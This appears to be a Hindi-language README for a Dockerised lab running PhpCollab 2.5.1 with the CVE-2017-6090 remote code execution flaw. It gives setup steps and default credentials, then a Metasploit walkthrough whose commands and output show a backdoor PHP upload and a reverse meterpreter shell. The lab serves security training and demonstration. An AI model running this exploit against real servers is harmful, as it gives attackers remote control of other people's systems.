
कंटेनरीकृत शोषणीय PhpCollab
यह प्रोजेक्ट PhpCollab 2.5.1 चलाने वाला एक कंटेनर बनाता है, जिसमें CVE-2017-6090 में वर्णित रिमोट कोड निष्पादन भेद्यता है। इसके अलावा, उस कंटेनर और mysql को शुरू करने के लिए एक डॉकर-कम्पोज़ फ़ाइल है जो डेमो दिखाने के लिए है, और शोषण के निर्देश नीचे दिए गए हैं।
docker build -t containername . या छवि jlkinsel/exploit-cve-2017-6090 का उपयोग करें
इस चीज़ को चालू करने का सबसे आसान तरीका संलग्न docker-compose.yml फ़ाइल का उपयोग करना है। अगर मैं किसी बिंदु पर ऊब जाता हूं - या लोग रुचि दिखाते हैं - तो मैं एक kubernetes डिप्लॉयमेंट या helm चार्ट बनाऊंगा।
तो, चीजों को शुरू करने के लिए:
docker-compose up
अब तक सब ठीक है! अब, phpcollab को डेटाबेस का उपयोग करने के लिए कॉन्फ़िगर करने और एक डिफ़ॉल्ट व्यवस्थापक पासवर्ड देने की आवश्यकता है। मैंने (संक्षेप में) इसे स्वचालित करने की कोशिश की, लेकिन... ठीक है... आपको ब्राउज़र का उपयोग करना आता है...
अंत में, आप लॉग इन कर सकते हैं और इधर-उधर देख सकते हैं, लेकिन शोषण के लिए आवश्यक नहीं है।
ध्यान दें कि यह डॉकर कंपोज़िशन स्टोरेज के लिए कुछ खास नहीं कर रहा है। यदि आप mysql डेटाबेस को स्थायी बनाना चाहते हैं, तो आपको docker-compose.yml में mysql सेवा परिभाषा में एक वॉल्यूम परिभाषा जोड़नी होगी। mariadb docker hub page पर उदाहरण देखें।
पहले - एप्लिकेशन को चालू करने के लिए ऊपर Run & Configure का पालन करें।
मैंने इस प्रोजेक्ट में कोई शोषण नहीं जोड़ा, क्योंकि, खैर, Metasploit।
MSF में नए हैं? यहां हमने अभी शुरू किए गए कंटेनर का शोषण करने का एक त्वरित अवलोकन है:
docker run -ti --network exploitcve20176090_default remnux/metasploit
इसे शुरू होने में कुछ मिनट लगते हैं। remnux/metasploit डॉकर हब पृष्ठ वॉल्यूम का उपयोग करने के बारे में बताता है ताकि भविष्य में इसमें उतना समय न लगे। लेकिन हम अब लगभग तैयार हैं!
एक बार जब आपको शेल प्रॉम्प्ट मिल जाए, तो आगे बढ़ते हैं:
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit
[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php
meterpreter >
इस बिंदु पर, आप अंदर हैं, और खेल शुरू हो सकते हैं।
यदि इस निर्देशिका का नाम "exploit-CVE-2017-6090" के अलावा कुछ और है, तो आपको ऊपर --network कमांड बदलना होगा।
साथ ही - हां, हमने msfconsole में रिमोट पोर्ट 80 सेट किया, भले ही बाहरी रूप से यह 8088 है। मेटास्प्लॉइट कंटेनर phpcollab कंटेनर के समान नेटवर्क पर है।
| फ़ील्ड | मान |
|---|
| Database server | mysql |
| Database login | phpcollab |
| Database password | changeme |
| Database name | phpcollab |
| Notifications | False |
| Admin password | changeme (या जो चाहें) |